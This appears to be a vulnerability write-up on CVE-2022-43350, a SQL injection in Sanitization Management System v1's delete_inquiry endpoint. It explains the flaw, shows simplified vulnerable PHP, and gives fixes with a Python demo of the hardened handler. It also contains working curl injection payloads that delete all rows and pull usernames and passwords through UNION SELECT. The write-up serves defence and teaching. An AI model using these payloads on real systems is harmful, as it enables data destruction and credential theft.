*Published: June 2024*


In the world of software security, even small web apps can harbor big vulnerabilities. Today, we break down CVE-2022-43350, a SQL injection vulnerability discovered in the *Sanitization Management System v1.*—a system often used to schedule and track cleaning activities in workplaces and public buildings.

If you run or use this system, knowing about this flaw is critical, and we'll walk you through what happened, show you real code, and explain how attackers can exploit it.

Quick Overview: What Is CVE-2022-43350?

CVE-2022-43350 is a vulnerability that allows an unauthenticated attacker to execute arbitrary SQL commands by manipulating the id parameter in a specific HTTP request:

/php-sms/classes/Master.php?f=delete_inquiry

An attacker can send a specially crafted parameter, tricking the database into running malicious commands. The result? Information theft, data loss, or even complete server control.

How Does the Vulnerability Work?

Sanitization Management System v1. lets administrators manage cleaning inquiries. To delete an inquiry, it provides a PHP endpoint:

/php-sms/classes/Master.php?f=delete_inquiry&id=1

The problem is *the id parameter is not sanitized or validated*. If a user puts something unexpected in id, the application passes it straight into an SQL query. It's like giving the attacker direct access to your database with no filter in between.

The code handling the request might look like this:

<?php
// Master.php (simplified for clarity); $conn is the app's existing mysqli connection

if($_GET['f'] == 'delete_inquiry'){
    $id = $_GET['id'];   // raw query-string value, used exactly as received

    // SQL query with NO sanitization! (this is the vulnerable line)
    $sql = "DELETE FROM inquiries WHERE id = $id";

    // Database execution
    mysqli_query($conn, $sql);

    // Response
    echo "Inquiry deleted!";
}

What's Wrong?
The $id variable is used directly in the SQL query—no checks, no cleaning. That means an attacker could send something like id=1 OR 1=1, and the server would try to run:

DELETE FROM inquiries WHERE id = 1 OR 1=1

That deletes all records in the table, and that’s just the beginning.

1. Normal Request (what the developer expects)

curl "http://example.com/php-sms/classes/Master.php?f=delete_inquiry&id=5"


*Deletes inquiry with id=5.*

2. Malicious Request (SQL Injection)

curl "http://example.com/php-sms/classes/Master.php?f=delete_inquiry&id=5%20OR%201=1"

You might even expose sensitive data:

curl "http://example.com/php-sms/classes/Master.php?f=delete_inquiry&id=5%20UNION%20SELECT%201,username,password%20FROM%20users"


- With errors or responses visible, an attacker might see usernames and passwords pop up in the output.
- Data theft: Sensitive data could be dumped.
- Privilege escalation: If linked to other SQL queries, attackers might create new admin users or access private data.

How to Fix It

1. Use Prepared Statements  
Never insert user input directly into SQL commands. Always use prepared statements or parameterized queries. Here’s how to safely do it in PHP:

$stmt = $conn->prepare("DELETE FROM inquiries WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();

2. Validate Input

Check that id is really a number before doing anything:

$id = intval($_GET['id']);

3. Least Privilege
Make sure the database user the app uses cannot DROP tables, DELETE everything, or access other databases unless absolutely necessary.
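To see the fix steps above working end to end, here is an added example (not code from the Sanitization Management System or its authors) that models the delete_inquiry handler in Python against an in-memory SQLite table filled with constructed sample rows. It replays the 5 OR 1=1 value from the write-up through the original string-building query and through a hardened version that combines steps 1 and 2; the hardened version rejects anything that is not a plain positive integer, which is stricter than intval() (intval('5 OR 1=1') quietly returns 5).

```python
import re
import sqlite3

# Constructed sample rows standing in for the app's real "inquiries" table.
SAMPLE_INQUIRIES = [(1, "Lobby"), (2, "Floor 2"), (5, "Cafeteria")]


def fresh_db() -> sqlite3.Connection:
    """In-memory stand-in for the application's MySQL database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE inquiries (id INTEGER PRIMARY KEY, area TEXT)")
    conn.executemany("INSERT INTO inquiries VALUES (?, ?)", SAMPLE_INQUIRIES)
    conn.commit()
    return conn


def delete_inquiry_vulnerable(conn, raw_id: str) -> int:
    """Mirrors Master.php: the id parameter is pasted straight into the SQL.
    Returns the number of rows deleted."""
    cur = conn.execute(f"DELETE FROM inquiries WHERE id = {raw_id}")
    conn.commit()
    return cur.rowcount


def delete_inquiry_fixed(conn, raw_id: str) -> int:
    """Hardened handler: accept only a plain positive integer (stricter than
    intval(), which silently turns '5 OR 1=1' into 5), then bind it as a query
    parameter so the database never parses it as SQL."""
    if not re.fullmatch(r"[1-9][0-9]*", raw_id):
        raise ValueError("id must be a positive integer")
    cur = conn.execute("DELETE FROM inquiries WHERE id = ?", (int(raw_id),))
    conn.commit()
    return cur.rowcount


def remaining(conn) -> int:
    """Rows still in the table, for checking the effect of each request."""
    return conn.execute("SELECT COUNT(*) FROM inquiries").fetchone()[0]


if __name__ == "__main__":
    payload = "5 OR 1=1"  # the injected id from the write-up, URL-decoded
    db = fresh_db()
    print("vulnerable:", delete_inquiry_vulnerable(db, payload), "deleted,", remaining(db), "left")
    db = fresh_db()
    try:
        delete_inquiry_fixed(db, payload)
    except ValueError as err:
        print("fixed:", err, "|", remaining(db), "left")
    print("fixed, normal id=5:", delete_inquiry_fixed(db, "5"), "deleted")
```

Running it shows the original query wiping all three rows while the hardened handler refuses the payload and leaves the table untouched, then deletes exactly one row for a normal id=5 request.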

References & Further Reading

- NVD CVE-2022-43350 Listing
- Exploit Database Entry
- OWASP: SQL Injection
- Official Sanitization Management System v1. Project (archive)

Conclusion

CVE-2022-43350 is a loud reminder: always sanitize and validate input in your PHP apps!  
Even a “small” management tool, if exposed, can be a big problem.

If you use this system, patch it ASAP or apply the code fixes above. Don’t let your data get swept away by a simple mistake!


*Have questions or need help hardening your web app? Leave a comment below!*

Timeline

Published on: 11/07/2022 15:15:00 UTC
Last modified on: 11/08/2022 04:19:00 UTC